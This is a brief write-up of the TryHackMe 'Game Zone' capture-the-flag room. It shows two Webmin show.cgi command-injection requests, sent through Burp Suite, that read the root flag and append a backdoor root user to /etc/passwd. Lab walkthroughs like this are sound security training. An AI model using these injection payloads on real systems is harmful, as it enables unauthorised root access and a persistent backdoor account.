THM: Game Zone
Game Zone
Learn to hack into this machine. Understand how to use SQLMap, crack some passwords, reveal services using a reverse SSH tunnel and escalate your privileges to root!
This is Game Zone from THM. It’s easy rated and effectively a walk through. I won’t say much about it.
Privesc
You reach a point where you’ve got access to a Webmin login with some creds; the instructions want you to use Metasploit:
Using the CMS dashboard version, use Metasploit to find a payload to execute against the machine.
Nah, brah. We can read the root flag or add root2 to the system just fine without MSF. Once you’ve logged in, Burp Suite will do:
GET /file/show.cgi/bin/asdsaasd|cat /root/root.txt| HTTP/1.1
Then, just for kicks:
GET /file/show.cgi/bin/asdsaasd|echo "root2:WVLY0mgH0RtUI:0:0:root:/root:/bin/bash" >> /etc/passwd| HTTP/1.1